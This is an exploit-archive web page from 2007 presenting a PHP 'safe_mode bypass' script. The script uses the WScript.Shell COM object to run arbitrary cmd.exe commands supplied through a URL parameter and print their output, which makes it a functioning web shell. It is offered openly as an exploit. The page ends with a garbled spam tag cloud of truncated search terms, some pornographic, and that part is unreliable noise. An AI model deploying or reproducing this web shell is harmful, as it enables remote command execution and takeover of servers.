about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit




2007-03-07 PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit
Rated as : High Risk

<?php
   //PHP COM extensions (inconsistent Win32) safe_mode bypass
   //by rgod

    $____suntzu = new COM("WScript.Shell");
    $____suntzu->Run('c:\windows\system32\cmd.exe /c
'.escapeshellarg($_GET[cmd]).' >
'.dirname($_SERVER[SCRIPT_FILENAME]).'/suntzoi.txt');
    $____suntzoi=file("suntzoi.txt");
    for ($i=0; $i<count($____suntzoi); $i++) {echo
nl2br(htmlentities($____suntzoi[$i]));}

   // *quote* from the php manual:
   // There is no installation needed to use these functions; they are
part of the PHP core.

   // The windows version of PHP has built in support for this extension.
You do not need to load any additional extension in order to use these
functions.

   // You are responsible for installing support for the various COM
objects that you intend to use (such as MS Word);
   // we don't and can't bundle all of those with PHP.
?>
securitydot.net - 2007-03-07

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 00:49:40 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.17pg.c news for c proftpd+1. www.zoo.co p...ups=8( www.51zbz. proftpd+1. Attachment INDIAN SEX Indiangirl www.xpu123 OpenSSH 4. Foto bugil rafe port 11000 www.etypw. sixe woman reversi Foto bugil xiaomaop.c vll ip board 2 www.lankag Indianerot Bigpussy.c Vidio porn SEXY.GIRL. CBACK Bigpussy.c all cartoo demi more ip board 2 msn messen www.136qq. www.asspor Animexcart sext tv Dastan ira t754t www.500gre www.18sex qmail expl 2/help/sql anl sex School sex MMMM www.xiaohu wz9178.5d6 ip board 2 Imagenes p